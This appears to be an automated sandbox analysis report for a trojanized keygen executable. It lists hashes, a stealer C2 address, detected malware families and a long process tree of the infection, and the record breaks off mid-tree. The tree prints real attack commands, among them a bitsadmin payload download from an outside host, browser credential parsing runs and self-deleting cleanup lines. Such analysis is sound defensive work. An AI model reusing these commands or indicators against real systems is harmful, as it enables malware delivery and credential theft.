Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-04-2021 04:36

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1072
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1172
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
        • Modifies registry class
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2740
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2436
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1860
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1392
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1360
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:860
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4292
                    • C:\Users\Admin\AppData\Roaming\twdjbsd
                      C:\Users\Admin\AppData\Roaming\twdjbsd
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1204
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5668
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4140
                    • C:\Users\Admin\AppData\Roaming\twdjbsd
                      C:\Users\Admin\AppData\Roaming\twdjbsd
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3596
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:1060
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:6112
                    • C:\Users\Admin\AppData\Roaming\twdjbsd
                      C:\Users\Admin\AppData\Roaming\twdjbsd
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6132
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5948
                  • C:\Windows\system32\rundll32.exe
                    C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\WaHGXmfr\WaHGXmfr.dll",WaHGXmfr
                    2⤵
                    • Windows security modification
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:6048
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:992
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:1808
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:804
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1536
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2172
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1912
                      • C:\Users\Admin\AppData\Local\Temp\is-CM434.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-CM434.tmp\Install.tmp" /SL5="$400C8,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:2788
                        • C:\Users\Admin\AppData\Local\Temp\is-6RGHN.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-6RGHN.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1972
                          • C:\Program Files\Windows Sidebar\XLGYRVETJC\ultramediaburner.exe
                            "C:\Program Files\Windows Sidebar\XLGYRVETJC\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4300
                            • C:\Users\Admin\AppData\Local\Temp\is-IR1TK.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-IR1TK.tmp\ultramediaburner.tmp" /SL5="$301EE,281924,62464,C:\Program Files\Windows Sidebar\XLGYRVETJC\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:4332
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:4376
                          • C:\Users\Admin\AppData\Local\Temp\eb-d1e0b-d6a-414a5-c51ea351159ce\Lovaraezhyta.exe
                            "C:\Users\Admin\AppData\Local\Temp\eb-d1e0b-d6a-414a5-c51ea351159ce\Lovaraezhyta.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4392
                          • C:\Users\Admin\AppData\Local\Temp\89-3765f-e40-61f87-0b57cf9929986\Hebiwuzhysho.exe
                            "C:\Users\Admin\AppData\Local\Temp\89-3765f-e40-61f87-0b57cf9929986\Hebiwuzhysho.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4452
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pncrwc5u.lka\instEU.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5016
                              • C:\Users\Admin\AppData\Local\Temp\pncrwc5u.lka\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\pncrwc5u.lka\instEU.exe
                                7⤵
                                • Executes dropped EXE
                                PID:428
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftarc5rm.b52\requête.exe & exit
                              6⤵
                                PID:4940
                                • C:\Users\Admin\AppData\Local\Temp\ftarc5rm.b52\requête.exe
                                  C:\Users\Admin\AppData\Local\Temp\ftarc5rm.b52\requête.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4424
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:2788
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                      parse.exe -f json -b firefox
                                      9⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Modifies registry class
                                      PID:5488
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                      parse.exe -f json -b chrome
                                      9⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Modifies registry class
                                      PID:5804
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                      parse.exe -f json -b edge
                                      9⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4564
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5u2llx5.gc4\google-game.exe & exit
                                6⤵
                                  PID:4236
                                  • C:\Users\Admin\AppData\Local\Temp\e5u2llx5.gc4\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\e5u2llx5.gc4\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2816
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:5164
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nx05bpwu.gf3\md1_1eaf.exe & exit
                                  6⤵
                                    PID:2488
                                    • C:\Users\Admin\AppData\Local\Temp\nx05bpwu.gf3\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\nx05bpwu.gf3\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5220
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hamri0zz.tyy\askinstall39.exe & exit
                                    6⤵
                                      PID:4232
                                      • C:\Users\Admin\AppData\Local\Temp\hamri0zz.tyy\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\hamri0zz.tyy\askinstall39.exe
                                        7⤵
                                          PID:5660
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            8⤵
                                              PID:6132
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                9⤵
                                                • Kills process with taskkill
                                                PID:5840
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oznynuwv.ynl\y1.exe & exit
                                          6⤵
                                            PID:5392
                                            • C:\Users\Admin\AppData\Local\Temp\oznynuwv.ynl\y1.exe
                                              C:\Users\Admin\AppData\Local\Temp\oznynuwv.ynl\y1.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5292
                                              • C:\Users\Admin\AppData\Local\Temp\lvW2skkuyp.exe
                                                "C:\Users\Admin\AppData\Local\Temp\lvW2skkuyp.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Modifies system certificate store
                                                PID:5576
                                                • C:\Users\Admin\AppData\Roaming\1619498114261.exe
                                                  "C:\Users\Admin\AppData\Roaming\1619498114261.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619498114261.txt"
                                                  9⤵
                                                  • Executes dropped EXE
                                                  PID:2456
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\lvW2skkuyp.exe"
                                                  9⤵
                                                    PID:3504
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 127.0.0.1 -n 3
                                                      10⤵
                                                      • Runs ping.exe
                                                      PID:4320
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\oznynuwv.ynl\y1.exe"
                                                  8⤵
                                                    PID:4932
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /T 10 /NOBREAK
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks SCSI registry key(s)
                                                      • Delays execution with timeout.exe
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4976
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fneztlv1.2j3\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:5872
                                                  • C:\Users\Admin\AppData\Local\Temp\fneztlv1.2j3\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\fneztlv1.2j3\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:4968
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2116
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4624
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1500
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5964
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4744
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5024
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:3844
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:5864
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppsqA6zrI5RhjVTH -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:4200
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZhNu4ylTUuyLBeS -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5428
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:6088
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4476
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4348
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5324
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2032
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5580
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WaHGXmfr\WaHGXmfr.dll" WaHGXmfr
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:1912
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WaHGXmfr\WaHGXmfr.dll" WaHGXmfr
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              PID:4320
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4172
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:4884
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:5740
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5496
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspC55B.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4244
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:4012
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5wtk3j1.ldh\inst.exe & exit
                                                                              6⤵
                                                                                PID:5908
                                                                                • C:\Users\Admin\AppData\Local\Temp\m5wtk3j1.ldh\inst.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\m5wtk3j1.ldh\inst.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5848
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsac5ulq.0dc\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:4648
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3jfrdhu.s0b\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:4980
                                                                                    • C:\Users\Admin\AppData\Local\Temp\s3jfrdhu.s0b\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\s3jfrdhu.s0b\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5904
                                                                                      • C:\Users\Admin\AppData\Local\Temp\s3jfrdhu.s0b\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\s3jfrdhu.s0b\toolspab1.exe
                                                                                        8⤵
                                                                                          PID:4976
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phhpyonl.s1k\app.exe /8-2222 & exit
                                                                                      6⤵
                                                                                        PID:3952
                                                                                        • C:\Users\Admin\AppData\Local\Temp\phhpyonl.s1k\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\phhpyonl.s1k\app.exe /8-2222
                                                                                          7⤵
                                                                                            PID:5660
                                                                                            • C:\Users\Admin\AppData\Local\Temp\phhpyonl.s1k\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\phhpyonl.s1k\app.exe" /8-2222
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5664
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbs4sfpx.xb3\c7ae36fa.exe & exit
                                                                                          6⤵
                                                                                            PID:5664
                                                                                            • C:\Users\Admin\AppData\Local\Temp\rbs4sfpx.xb3\c7ae36fa.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\rbs4sfpx.xb3\c7ae36fa.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:3936
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4628
                                                                                    • C:\Users\Admin\AppData\Roaming\54AD.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\54AD.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:516
                                                                                      • C:\Users\Admin\AppData\Roaming\54AD.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\54AD.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:4960
                                                                                    • C:\Users\Admin\AppData\Roaming\58F4.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\58F4.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4560
                                                                                      • C:\Windows\system32\msiexec.exe
